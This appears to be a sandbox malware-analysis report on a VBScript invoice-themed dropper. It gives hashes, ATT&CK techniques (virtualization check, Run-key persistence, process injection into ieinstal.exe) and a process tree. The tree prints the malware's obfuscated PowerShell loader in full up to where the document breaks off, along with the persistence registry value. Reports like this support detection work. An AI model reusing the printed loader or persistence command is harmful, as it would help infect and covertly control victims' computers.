af154e279f5a8b88fa8d53f212d8ec3299b34bd94c1fe49e2342ed3a87724975

General

Target

INV CI915998.vbs
Size

402KB
MD5

249154effa627787fc5ca1110513b3c2
SHA1

d0b5cbd1272ea1fa66add9b0a302ccb9e091af88
SHA256

af154e279f5a8b88fa8d53f212d8ec3299b34bd94c1fe49e2342ed3a87724975
SHA512

b1cb5bed6ee1dba065dc073421b1cf6c5943fc5eb29bd3a7a5a5a8f78801aae1822070f32c7c0747e89591bf2be1ff734e86484b74b0ae6238db9c8cad9976c2
SSDEEP

12288:r0prEK6Jf6JqHkyVF2uT8DHdVlelVCBpMCdoX:rzqYYOmdVle+Btdw

Score

7^/10

persistence

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Windows\CurrentVersion\Run\Begyndelsesbogstavets = "%tullio% -w 1 $Linial=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Bastardmrtlens;%tullio% ($Linial)"	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1236 powershell.exe
544 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1236 set thread context of 544 1236 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1352 powershell.exe
848 powershell.exe
1236 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1236 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1352 powershell.exe
Token: SeDebugPrivilege 848 powershell.exe
Token: SeDebugPrivilege 1236 powershell.exe

pid	process
1236	powershell.exe
544	ieinstal.exe

description	pid	process	target process
PID 1236 set thread context of 544	1236	powershell.exe	ieinstal.exe

pid	process
1352	powershell.exe
848	powershell.exe
1236	powershell.exe

pid	process
1236	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

WScript.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1124 wrote to memory of 1352	1124	WScript.exe	powershell.exe
PID 1124 wrote to memory of 1352	1124	WScript.exe	powershell.exe
PID 1124 wrote to memory of 1352	1124	WScript.exe	powershell.exe
PID 1352 wrote to memory of 848	1352	powershell.exe	powershell.exe
PID 1352 wrote to memory of 848	1352	powershell.exe	powershell.exe
PID 1352 wrote to memory of 848	1352	powershell.exe	powershell.exe
PID 1352 wrote to memory of 848	1352	powershell.exe	powershell.exe
PID 848 wrote to memory of 1236	848	powershell.exe	powershell.exe
PID 848 wrote to memory of 1236	848	powershell.exe	powershell.exe
PID 848 wrote to memory of 1236	848	powershell.exe	powershell.exe
PID 848 wrote to memory of 1236	848	powershell.exe	powershell.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe
PID 1236 wrote to memory of 544	1236	powershell.exe	ieinstal.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INV CI915998.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hampegarn = """SkFPauRenWicUntSoiTooVonFu ReHGrTSpBmo Co{sk Un Pl Im TrpPlaInrAnaMumBe(Hy[BeSeptBrrCyitinFogFo]So`$siHSkSMy)Ge;Re Di Ra jv Sl`$TeBIdyLitJaePisTe Un=Is LaNPhePswTi-CoOKobDyjPeeUdcRetAs DebLayMotlaeTi[Ek]un Un(Re`$UnHArSRa.GoLSveKonsugButTohGa Ca/ag Mi2Co)Sh;Bu Da Do Tr QuFSnoTerPi(st`$PriMy=No0Br;Vi Su`$UniKo Si-ValBltGi Ga`$StHReSsa.GrLBeeStnSagNotHehVe;Ha Po`$Ekiva+Ps=sy2Re)Mu{Dr Ra Zl Nu Am Mo Br an Ro`$poBSeyKntCaeMisUn[Fa`$EliCa/Po2Ne]ov Un=Ge Ch[CicSeoPanBrvSueMyrGotBa]Co:Br:ssTTiocoBPayHutFoeFi(Om`$UnHTeSBe.AfSAeuspbAasUntHirSliUnnStgCa(Bi`$NyiRe,Fo us2Cl)su,Op An1To6un)Bu;Su Re Ca`$AuBBeyFotInefisDe[Ca`$SaiJo/In2Ba]He Se=Is Fo(Du`$SlBReyDutdeeMusJu[Bu`$RviSl/Ob2bu]Ko Ph-ThbSoxHyoMarTa af6Un0Ta)Or;Xi Fr Eg Op Ma}Re An[VeSRrthirGriAfnStgXy]be[WhSAfyAmsFitAseFimUn.AdTTueTexPatLo.MiELenIncInoUrdCuiimnSagMe]Na:ve:SfAInSAtCTaIMuIMi.KaGMeeUntPaSUntsarfeidinTagRa(Op`$MobMgyAntSeeBesRe)Um;Un}Ca`$FuAQucsecUnlpoiAnmKraPotVeiLeoBanChsBo0ta=FeHMiTTiBDo Re'In6NeFUn4Ne5Da4spFas4re8te5Ou9Bl5De1Cr1Dr2Sn5Fu8pa5Ch0Wi5vn0Mi'Ta;Sc`$BeAOvcKocKnlTriIomWeaFutHyiGaoLenflsSh1An=beHReTEuBNo Op'Pa7Ov1be5Pr5Er5ViFMi4UdEPr5Tu3Pa4BoFHy5Sk3Ot5PiADi4Fd8Ps1Sk2Jo6SeBSs5Fi5ti5Sc2Kr0CrFMi0ApEGe1Sh2Fr6St9Ju5Vi2Ho4OuFDo5MoDBr5PhANo5Hj9Ka7Un2Ra5NoDHe4Ca8Is5Pr5Co4StAKu5Cl9Sc7Vi1Op5Pa9Ag4My8Ov5Sp4Ro5Di3Au5Ra8Ta4TiFCh'Bo;Or`$PoATvcRecMelDeiVamSpaPetSkiUpoGynGosEx2Sy=flHScTTyBWh Ou'Fo7NeBNe5pt9Po4Bl8Fo6AuCDe4HoEGl5Ca3Tr5NeFUn7MiDEn5Me8Ud5Cu8Op4OuESo5Fo9Re4BrFSu4LrFIm'Di;Sp`$HaASpcBlcAllAniCamExaMatDiiRaohonTasGo3Al=NaHRoTPoBFi Ch'In6PaFBo4Sk5Tr4fgFAc4Em8bo5Im9Ch5Tw1St1In2Ko6KiEMe4sp9Di5Ha2An4fi8Ob5No5sa5bi1Ap5An9Vo1se2Tr7Bi5Ko5St2Cu4St8ra5Ve9Jo4InESt5Bi3Ga4xiCRd6skFAc5Dk9Aa4StEMo4HaAPa5ge5Ge5TrFOs5Si9Al4SeFHa1te2Pr7Lo4Fr5OxDTw5Co2Sk5Ou8Tr5be0Fo5Pu9me6StENo5Un9Ty5PeABr'Je;Ek`$AkAPrcFocSklSeimomDyahvtAtiNooOnnLasEk4Ha=reHElTArBOb Fa'un4DrFLe4Va8Ma4RuEHo5Pi5Do5Lu2El5BlBAb'Jo;Ho`$ReATycKrcNulKoibimBaaImtRoiRaoBrnKosUn5Fa=PhHMoTSnBSp Ri'ma7UnBEm5ek9Fl4Lo8Ha7Be1Sv5pr3Do5Si8Ca4Bl9Pr5ju0Gn5Fu9Be7bo4Ko5SkDKa5Ct2Gn5Ar8De5Br0st5He9Ma'Ti;Op`$MiAGacVicSelstiRemBaaGatReiJioqunEgsLo6Re=CoHFrTScBso Ga'Ma6UdENe6Ur8Un6UnFAf4SuCst5La9Ko5rbFKo5Ae5Di5SpDTe5Va0Sp7Co2Fl5ToDOr5Tr1ci5St9Hk1Sk0Fl1FrCRu7Su4Fr5Cl5Co5vr8Af5Po9Ta7RoEHy4Fu5sa6PsFGi5In5Va5FoBli1sh0Em1BaCco6KeCAn4Fl9Co5suEBu5Co0Fo5Co5Ti5PrFAb'Re;Pa`$ArAPocIncGrlBaiDamFiaMitpaiUnoSlnSpsMi7Ox=EkHHeTfiBGe Ca'Ca6InESi4Fa9Sa5Da2Un4Lo8Ta5So5Ng5Ps1wa5Po9us1fu0At1afCSc7Ob1pu5MiDTr5Pi2Ud5SeDPi5StBRh5Ka9Ba5He8Su'Di;St`$PrASecSlcStlStiBamkaaLetAfiAroFonDusH 8Ha=DeHIkTUnBFo Sc'si6DdEBr5In9Fa5ReALa5Bl0De5No9En5PrFBr4De8Ku5El9Pr5Gn8di7Mi8Ov5Se9Im5Rr0Re5Ri9Fo5AfBFj5heDfi4Bl8Ot5In9No'Ho;ac`$SuAHacVicOplPriMemNeaLitStiJuoprnElsFo9ba=SpHErTInBRe Hi'om7Ub5Ku5Th2Po7Fi1Er5An9St5Ka1Pr5br3id4NoERi4Er5Re7an1pr5Gr3Ov5Sp8Al4Mo9Wi5Fj0Fg5Ro9Ga'Sp;Ud`$MaOspvUneBerMisFuoSoeSviResSpkCheCh0ex=coHLaTSoBIn Ou'Af7bi1Su4Sa5In7St8Un5Sk9Re5Ka0Fi5Kv9Ca5vrBNa5AgDRi4Wo8Ti5As9Di6Pe8Ti4Ly5Un4lgCUn5al9Co'Un;Be`$ScORavSieSnrUnsCaoEneFeiResMskHoeSg1Kr=BrHafTHaBRe No'Am7DiFDi5ga0St5ThDhy4DeFBa4PrFOp1Ba0Sk1SmCSy6PoCFl4Af9se5ChEGr5bo0Fo5Kl5Vo5MuFFo1He0ek1NoCTr6ShFPr5Vo9Gr5agDLa5So0be5Eu9Ke5Su8Hj1Ve0Wa1JtCSu7FoDIn5Gu2To4ExFPa5De5Co7PeFDo5Ri0Qu5blDas4UnFIn4FiFOl1je0Bo1OmCPi7RnDGa4Co9Or4Dr8Ey5Ro3Bl7OpFTr5Po0Ch5LiDBa4HoFAn4DaFOv'Ge;Mo`$SkOSevprePyrFosPloepesaiUnsRukAfeDe2Pr=BlHClTMeBUn Pl'si7Ef5De5Sp2Ac4FoASk5Pi3Ba5Op7Re5Pa9Ma'Da;Fy`$CaOTavuneKorPesTroBreKoiRksUdkBdeUn3Ry=FuHUnTBeBCo Pr'Pr6FlCMi4Hy9Co5SeEFl5Sm0Sv5Ud5Sa5keFFi1Bi0De1MiCSk7Te4Fo5un5Wo5Af8Di5Fa9ba7PtEUn4Tr5in6AvFTr5Be5At5PaBUn1Tr0Fr1KoCEn7Sl2Me5Pe9tr4StBTh6OpFDu5Re0Fo5Ho3br4Ag8Ka1sl0Un1BeCIn6NyAOp5Wi5La4InESm4Me8Fo4Ud9Sr5naDPr5Et0Ho'Af;Ud`$DiOGlvKueOvrFesMioFeeNyiInsBokUnere4In=CrHHaTBaBsl No'Ph6NeAMi5Su5Co4DoELe4pl8Hu4Tu9Mo5ElDHi5Am0Op7StDki5Ab0Nu5Ve0St5Ti3mu5HaFSn'Ae;Pr`$InOVivNueUnrGasGuosteQuiFlsTakDeeAb5Sn=SaHBiTUnBmi Ps'Kl5De2Py4Tu8Ud5Ub8Da5He0Gy5Gi0Ti'Ku;Ne`$EcOAlvIleRirAdsReoLeeSuiTysBakUneFl6Al=SeHStTTjBSv Ud'Tu7Un2Wh4Pe8Po6UdCOv4AlESk5Pr3Fu4In8Ti5Kr9Sl5hiFOp4An8Hy6FoAHy5Bl5Sm4PaECo4Bl8ek4Fo9Fu5DiDSp5Un0Fi7Us1Br5Ua9Va5sp1Ci5He3Hv4ReEUn4Ra5Op'Fi;Pm`$TeOBlvOlecordasKroUneThiVesTekBreTo7ob=EmHItTNeBev Se'Au7Li5Sc7Fo9Mi6Ti4Pu'Fa;Cy`$HaOAlvCaePerDesHjoateAniKusTokUneSh8Ha=PsHAnTHeBPo Ap'He6El0Bu'Di;FlSCreMutSu-SmALilUniGaaIcsUh By-ManhoaPamAaesv PaOTrvAaeOprDrsInoafeDviSesRekSkeCo9Mu Ek-DivQuaLolUnuCoeFo Ad`$CaOHevUleTirHysIsoTaeTriBesPakAfeSe7Fr;MefSouRinTocSptluiBiogenSn anfMekPrpGo Be{asPEnaThrNuaBemSu Ho(Fr`$Savtr_SpmMa,ca Ge`$EnvAl_UnpKa)Sk Sp De Un Ta En;Wr`$PaKExaBrnOpdOviFidRwaFotSkfafeKnsPitkaeAfrUd0Be Eu=opHHeTSlBAf fl'Ci1Fo8ph4inAho4Ep9Ev5Af2Br5Ga1Sh1RaCjo0Kl1Sh1LaCTr1Ko4Pl6Ly7Af7VeDKo4UnCSe4PrCJo7Op8Co5li3Kr5Ko1De5WaDbr5Za5Su5Kr2Sy6Ap1sc0et6St0Ty6Wi7GeFAr4Kn9Al4saESv4PoEEl5di9Me5be2Se4St8Se7Pe8Ta5Os3op5Ec1To5InDGh5Ps5So5Af2Wi1St2Sn7BeBSe5dd9Gt4Ba8ku7UnDGi4KaFAf4EnFJa5Sk9Ju5De1Mt5LiEMa5Re0Sc5Re5Sa5Ve9In4MiFSk1ti4re1Be5In1KiCVe4Tz0Fe1YtCTr6BaBGr5dk4so5Hj9Re4HoEde5Et9Od1bl1Va7Su3Ru5FoEMe5Fe6Ur5Ru9Ad5InFfe4Bl8Dr1MyCBa4in7Pr1SaCUd1Le8Gu6Va3Ho1Af2Be7auBFl5Af0Se5Ge3Bo5KaEMa5diDTi5An0Sy7SkDFa4BeFVe4InFMe5mi9Sg5Da1Ge5SiECa5Bi0Ju4Na5Se7HaFNa5ChDBo5TrFPo5Fo4Ef5Th9Be1TuCCe1Di1Ra7UnDVi5An2Br5Wa8Sk1StCIn1Af8Sp6Sp3Dr1Tr2Dr7Hs0Fl5Da3Me5crFDr5UnDDe4Ri8Fo5Sw5Ni5Me3Du5Be2Un1Ph2Sk6SuFGa4BeCTo5Ap0Ho5Ca5Im4El8no1Ca4Bu1Va8Da7Fe3Gn4peADe5Za9Su4ViERa4UnFUd5Fo3Si5Na9In5Ti5Fo4BeFSa5Ta7Ko5Sk9Hy0Dr4Su1Ga5Ba6Ob7Rr1Do1Di0FrDPh6Ad1Go1Cr2Pe7ly9Im4StDIr4Bd9Na5ShDFo5en0Ma4VvFEr1En4Ap1Fr8in7PiDPr5UnFin5FiFNe5Va0en5No5Ga5Ob1An5SnDVi4Mi8Fr5Ro5Ba5Al3An5Ar2Du4NoFUa0ChCHo1Mo5Ca1SpCBe4Se1Ma1Re5Uk1Fa2Ro7BrBDi5Ci9St4ro8Tr6Bl8Pe4Fl5So4HaCEn5Ba9Dr1Ho4Mi1Sh8In7QuDDe5BaFEs5CoFBa5Sk0Ba5Fr5Qu5Ph1St5SeDOv4Li8Tr5Na5Fa5Sq3No5Lk2Re4GeFTr0InDKo1Sp5Po'Re;SoOPrvSteNorUfsPhoSteGoiSasMikUreFe9Tr Fo`$CiKLoaStnPrdPaiWodOuaDatKnfFieNosUntSwesyrDi0Pu;Ge`$StKFoajanTudSoiPidTaaKrtSefFreCosIntReeParFa5ta Sm=Cu StHReTTrBTe No'De1Fl8Ba4SpARe5CuDAn4OvEun6Di3Sk5PoBMo4TiCRe5StDFe1UnCGl0Kl1Be1HyCFu1Be8Ku4inACo4Ba9th5Kr2Go5Ep1Hn1An2De7UdBMo5Va9Re4Af8Dr7Lo1Ep5Pa9kp4Pr8En5Pi4Iv5Op3Mo5Pe8Pa1Sl4Fa1Le8Nu7ChDKb5HaFSt5BrFMa5Sa0Pr5Va5Na5Hj1Ar5MiDRe4Eu8Su5fo5Ne5Br3Kv5Sa2Un4SlFPl0EpEVe1Se0de1WoCHo6Wa7Dr6Aa8Sk4Af5Ne4SkCCu5Ud9Ge6Sa7En6Me1Ap6Fl1Bj1SlCAf7GeCZa1St4Fa1Su8Te7SpDAr5StFCo5PlFJe5Ki0Or5Ti5Va5Ad1Ko5FiDRe4Cr8In5Ov5Bi5In3Fl5Bo2Pa4TeFSn0OrFIn1Ov0An1lvCDa1Re8Sp7shDUr5miFla5TrFku5In0Ha5La5Ae5Fe1Di5GeDTi4Mo8Se5Pe5Go5Yd3Th5Ta2Pa4QuFSu0Gr8De1Ko5In1Va5Le'De;unOPivReesprLasEnohiePriFosPekEnefs9Ga Ko`$ReKThaGunIgdCoiNidUsaFrtUmfSaeEnsVitFoeFarPa5Hu;Su`$woKDoaBrnSmdMiiUldHoaAftFrfSpeCasPutNoeKrrTh1Su Su=Cr OuHBrTUnBUn In'Gr4FrEAn5Ud9Ta4Tu8Di4Ch9Af4LuEFl5be2De1FaCSe1al8Aa4NaAOp5ReDBo4ReEKo6Es3Sa5paBPa4UdCFo5UnDBr1Am2Os7ym5Ti5Te2Di4DeASv5Ma3Sp5Ry7Pr5Br9Fe1Ul4Me1ch8Ar5In2Hy4Po9Ma5Om0Ka5Af0En1Ov0so1TeCPl7MiCLu1Un4Te6un7an6UlFOb4Be5Sh4TrFHs4Vo8Po5So9Ch5Ln1Re1No2Un6InENo4Un9Ko5To2Ac4Ud8Be5Af5Fi5Br1Dr5Ur9Lu1No2Va7af5No5Fe2St4Ri8Am5Un9Su4SaETr5Bl3Re4quCPr6SkFGd5fe9Sp4GuETr4ApASk5pa5Te5DoFel5Su9si4HyFCa1Te2Su7Sn4Un5AdDKa5un2br5Ti8Un5Ca0Un5Un9In6EnESm5Ca9Di5HaAFi6Re1gi1Br4Ci7Pi2Ar5Na9Sm4SpBSn1re1Me7Su3Cl5ChEIn5Sv6Ae5Se9Cl5FlFCa4Br8Mo1SuCCo6ReFUn4Fo5Si4WaFBe4Sa8Ni5Pr9Ho5Ki1Im1br2Un6UnEFn4st9Ls5Pu2Hy4Ou8Pr5Ga5Un5Un1Bo5Fl9Ud1Ba2Re7Ar5Po5Ch2Ov4Re8Ud5Dy9tr4euEku5To3Tr4PrCOs6CoFpa5du9Ha4ptEFo4HeASv5Oe5th5CoFMa5Ma9se4NeFSt1Na2Fl7Jo4In5FoDBe5Ko2ou5Mi8Un5Ha0de5ca9Hi6ArEVi5By9Un5PeAHu1Sy4Fr1Fi4Si7Lo2ne5Um9Dr4prBAr1Gl1Oa7sk3Ge5KnEca5Hu6In5be9Ce5DuFRe4Ef8Ca1TvCJu7wi5To5Te2Kv4Uf8Mi6ArCsp4Ch8In4UnEAl1re5Mi1Ke0Sp1SuCTi1Tr4op1Un8Ce4FlASk4ge9Af5Fo2Li5Te1ve1Pr2La7KbBDr5Ga9Ta4Kr8Ha7De1Re5Ud9Jo4Ry8Re5Sy4Sa5St3Na5Va8Sh1Ra4Bi1Ch8St7SkDAf5HaFUn5CuFCl5Ca0St5Eh5Fo5fi1Di5SeDBr4Ti8Id5Co5Ku5Su3Ve5Cr2Bl4PaFRe0Pr9Re1Su5ty1La5Na1Su2Nd7Rh5ov5Su2La4paAMi5Ar3Sm5Bu7Ch5Ex9Sc1Sn4Bi1de8Pa5In2Ra4Ju9Oc5Te0Ko5Fa0Fe1Fa0Ha1UdCMa7AgCOs1Tr4Co1Sk8Co4GyAKo6Dy3In5En1Be1An5Pe1Cr5Ha1St5Em1Sa5Ap1Le0Te1SeCSu1Ol8Vi4SuAMa6Hy3Ag4SkCAl1Re5Mb1So5Me'In;UnOwavSoeRerHesPuoKaeuuiSysHekWaeSq9Sp St`$DaKUnaEknVidafiHidSkaSotovfKaeNosMetFeeAfrDe1Sl;Ko}KvfKouNunhacSttRiiMooPrnek asGTrDDrTAs St{BePNoaUnrUnaPamar St(Be[DePocaMnrVoaMamUneSltBleBurim(TyPCooidsMiiUntspiSpoConBi Ka=lo fa0Un,la OvMSaaDenAfdPlaattUpoThrMeysa Mo=Pi Sy`$MeTSurHouSiePr)su]Fo Br[BuTRyyOvpZaein[Ko]Ka]Sc Fo`$ArvTraSkrBe_BupAnaNorSiaElmHaeAntTaeRerSksSm,Pr[LuPWoaJarTraOxmKeeUntEleLorAd(GlPTioposPeiBytIniEsoTmnJy Ud=Co Ty1Bo)Au]Ek An[OpTPuyNopLieSa]Bi An`$KevMarRetSt Bl=Sv Un[CoVGroAsiArdBu]Ir)Em;Tr`$GrKPeaLanKidMeiKodSeaBltlefTreCasKutAreherRe2Hi Za=De LaHanTDaBPu Go'Go1Wa8ya6GiAgi6Sa8Ne7PiEBe1fiCGn0Je1tn1stCPr6Mu7Mo7TrDDe4HaCTo4PiCar7Fi8Ci5Ko3en5Ko1Se5UnDFo5Ad5Ja5Ka2Co6al1Pa0Sc6Be0Eu6In7PaFsu4Ha9In4EnEDr4LyESt5St9La5Po2Ma4Pa8Te7Ud8Op5Gr3Sk5Sk1Ti5udDUt5Op5Ta5Mo2Sk1Fi2Al7Pu8Kd5Ch9pr5ApABr5Fa5Mi5In2An5Su9Un7Bh8Sn4Dy5Mo5Qu2In5SkDGr5Jo1Kr5Di5Ps5KaFti7UnDRs4LaFUn4maFSu5Ma9Ni5Fo1mu5NiEAd5St0Ma4Ec5Be1Pe4ma1mu4gr7Le2Th5St9Pt4HoBUn1Ti1ja7Li3St5KnEIm5Et6Fa5Ex9Ne5OsFBl4Ca8Ho1TuCPa6CoFBi4Di5Ho4SjFUd4Cz8Ti5Fl9Ek5In1Dr1Fr2Sl6PoESe5Ne9Di5ReANo5Ra0Fr5Wa9Du5PeFKn4Be8Fo5Mu5Ra5Pe3je5Te2En1Ma2Ba7FeDRe4RaFTi4BuFPa5Am9In5In1Ca5WaECa5De0Ch4De5Gl7Tc2Di5RiDNo5sk1Re5At9Su1Re4Ba1Do8Te7CrDSa5IsFMa5NoFMe5Re0Jo5Mo5Im5St1Po5OpDOd4Un8Sk5Su5Un5Ni3Me5fr2Co4huFMu0Il4Af1Al5Cu1Uo5Ba1As0Aa1CaCCa6Co7sr6FaFca4El5be4SeFTr4Un8Fd5Ar9Un5fr1Ut1Ac2Un6PaECl5ag9Gl5MiAPr5Ce0Hy5Sm9Un5HeFAa4An8Hy5Ov5Mu5Gt3Bl5Di2Tr1us2Do7Pe9Co5Ja1mo5Kp5Ca4Po8De1Ad2Pr7InDEk4GeFPa4SeFIn5Be9Ad5Di1Si5LaEMi5As0Co4Au5Ld7FuEMe4Sy9se5Kl5Fa5me0Af5Da8br5Fa9Gu4NdEUl7DiDAf5BiFUn5SmFCy5In9Gs4HjFBe4KvFAp6Ga1Ju0Br6Or0Mo6Ov6GiEKl4Th9Ga5Be2In1om5Pr1Li2Ra7Ze8Ti5Te9Pa5AfASo5Pn5pa5ru2Be5Qu9Bd7Me8Go4Am5Sp5Po2Le5PeDTa5Sn1To5Sa5Sl5KeFUd7Pa1Mi5Un3Sn5Fe8Ph4re9Bl5Fa0Am5Dy9Po1Ud4An1St8Tj7ObDMe5EdFAc5LuFKo5Ca0ag5Co5st5Sp1Gu5FrDBa4No8Un5Co5Su5Sl3To5Tr2He4JvFOi0Po5Ca1Fl0Jo1PhCIn1Ta8na5BiAsi5KoDCe5Co0Su4CaFFi5Ti9Sa1Te5Ro1te2In7Sk8Ld5lr9Pn5UnAYd5Hu5Co5Aa2Fu5Is9Om6Sk8Ch4Kl5Un4PsCDe5Vl9Ap1Sd4Fo1Py8Co7Ph3Tr4NuAri5pr9un4InERi4AmFEl5St3El5sl9Be5Fi5Se4KiFTe5Op7La5Me9Re0NeCKl1Ti0Bl1StCAu1Br8Bl7In3Du4ReAEl5sm9Sp4HaESk4DiFTj5mu3Mo5Er9Bo5Ks5Fl4AgFVi5Gr7Pa5Eg9Be0AaDPl1Le0Fo1SeCNe6Ge7Sa6PoFRu4Ja5Co4raFBe4Di8Pl5Kv9Da5Ev1Un1Ra2Pr7Aa1ov4Dr9Lu5Fe0Ou4au8Ma5as5Ta5UnFHa5YeDFe4FlFSu4Un8ca7Br8Ju5Re9In5Bl0Fi5Ch9ba5VrBCy5SyDWi4ur8Lu5Gu9So6Pr1Sp1Mu5Fo'Ov;HuOAuvReeBarsusUnoGnePriCosCekTreMe9He Mn`$CoKDaaprnCudFoiSadHoaeltDrfBaeLesHntNoeSirMa2Op;Im`$DeKBeaLinCydLeipodHeaLetAnfQueBrsSatDreOcrRa3vl Sp=Ta DeHBaTBeBSl Fr'Ha1No8Ba6CoAUn6Be8Ab7RaEAf1Lo2Fi7Ba8Sa5Va9Bu5GeADe5Sj5Ve5Un2Pe5Ub9Pr7SuFGr5He3Pa5Bu2Fr4soFBe4Ns8Ve4TjESt4Ar9Sy5PaFfa4Ry8Us5As3Wa4PlECe1La4Hy1Me8Un7SkDBa5StFAl5HeFPh5Ko0Ml5Ek5Co5un1Ar5InDAf4So8Pr5In5Ra5Br3Ve5Un2Kn4EpFFo0RoAAd1Fr0Ox1HaCSy6fo7Op6AtFKi4Se5Ki4FoFFy4Ra8un5Op9En5Ne1Um1le2Al6FoEPr5Pr9Ud5AnAdu5An0Na5Ix9Sa5AdFDd4Sc8Af5Ba5Kl5Be3Bi5Ne2op1Kl2Ha7MeFSa5YaDOp5jo0Ud5di0Lg5Ru5Er5Bu2Ph5KiBSa7InFFl5ul3No5Se2Sc4RoAMu5nr9Sa5bo2Aa4Un8De5De5or5ra3Ch5St2Ha4PiFTr6Tr1Be0Pi6Re0Sk6Aq6MaFAr4Re8Fe5AlDSl5Ny2Un5Bi8El5SeDMi4ShESt5Sa8Mi1Cu0cr1VeCHe1Lu8Pr4PsABl5IsDRe4NoEgl6So3Ba4LaCRe5NaDAg4PyEAn5PaDPo5Ep1Af5bo9Tm4To8Fl5Op9Un4AnEUn4DiFHa1An5Tr1Co2To6SyFBi5Ev9Ce4Ca8Le7Re5Ov5Fr1Ta4UnCGe5Au0Re5To9Ba5Te1Ac5Re9Ad5Bn2St4Aa8Ag5AsDFo4Di8Va5St5St5As3Af5Do2Un7AfAUs5Ny0Mu5ReDHy5ReBTa4AnFGe1Na4Sk1Ce8Ch7LoDFa5NoFAu5GtFVa5In0Ci5Op5Un5st1Si5FrDSc4Su8Li5Si5Rh5Te3Sk5ry2Br4TiFAl0KrBEg1Kn5Be'im;puORovGteBerSlsHroNeeBliVesCakPreRi9Re Jo`$KeKAnaTmnTrdRoiBrdQuaAdtTrfPaeSmsLotbeeKirBa3te;Qu`$RiKInaCinDidEtiCldAnaDetInfCaeinsAltWeePhrPa4Le Dd=Ra PnHScTClBAl Da'In1Or8Je6TeADa6Ma8Ak7BaEPo1Mi2De7Or8Af5Br9Sa5UdACo5Be5br5Ol2pe5Be9In7Sp1En5Un9Bi4Pe8Ve5Kn4Er5In3Em5Uf8As1Fo4Op1Ab8Sl7Ra3In4BaACh5Bu9un4RyEGa4SpFAd5Sk3Li5ti9Ba5Sa5Au4OsFEm5tk7Fo5Mo9Ph0HvEGs1Sl0Pa1MoCBr1Pl8Se7Vi3El4LnABr5Un9Ve4GlEUd4EkFFu5Ud3Ta5Ma9In5My5St4UsFsa5Po7Un5Be9Br0MuFiz1Pr0In1MoCPe1Sa8Sk4BeASt4GeESm4Cy8Ka1Cy0St1CaCSa1Rv8La4PlABu5SuDGl4PaEPa6Fe3Bk4FuCUn5EnDBv4seEPl5NaDUv5Oo1Pa5Be9Tr4Ju8Hu5An9Sa4ImEFo4AfFRi1So5Pr1Mo2In6PoFFo5Tr9De4Ra8Ky7Ma5Eg5Fi1Ag4ChCRe5Fo0Su5Ca9Ex5Ch1Un5Si9Un5Re2Ac4To8re5JoDAa4Si8Ca5Su5El5Vi3fu5Lo2Fl7KiAPo5Un0Tr5frDSw5EkBKo4UnFBe1He4Hr1Lu8Mo7ReDRe5ReFSn5TrFUn5Sp0Th5Ra5Un5Kd1Di5KrDTe4Sv8Ce5Co5Pr5Ca3Pr5Fi2Kr4EjFDy0DiBru1Mi5In'Mi;ReOUnvVeeRerStsEmoapeViiOusHekPreLi9Su Se`$AnKGuaBonEmdIniFydDiaJatSifBiegesBrtDieStrhe4Ul;Fa`$TrKUnaConPrdUdiIndPhaWitMofSheFoskatDeeEurek5Sa Ho=Ge InHHaTBiBEu Ha'Sl4LiEEc5ko9Fa4Or8Go4Pr9Ga4MaEWa5In2No1keCOr1Pr8Fi6RoAHy6Sv8Sk7DiEKi1Un2Ar7UnFXa4TaEVi5Un9Tr5BoDDa4Da8Pl5St9Sp6Su8in4Sp5Ic4UdCFu5Fd9Di1Ma4Zi1Br5Mi'Me;BaOOpvplescrFasEkoFoeNeiBosWikReeKi9He Be`$DeKReaDonAfdBaiafdZyaNotRyfGaefasSotViePerMa5Fi Ty Ek Re;Ta}By`$LikCakSk No=Cl PoHVaTVeBGr Gr'So5In7re5La9Di4MaEDo5lo2Ma5Im9Sc5Fl0Ro0VgFOu0udEBo'Sa;Bu`$BeKOpaLanNodOpiDidFoaFutStfPreOrsUdtSueKarVo6Ga Pr=Sa NoHFjTFaBAn 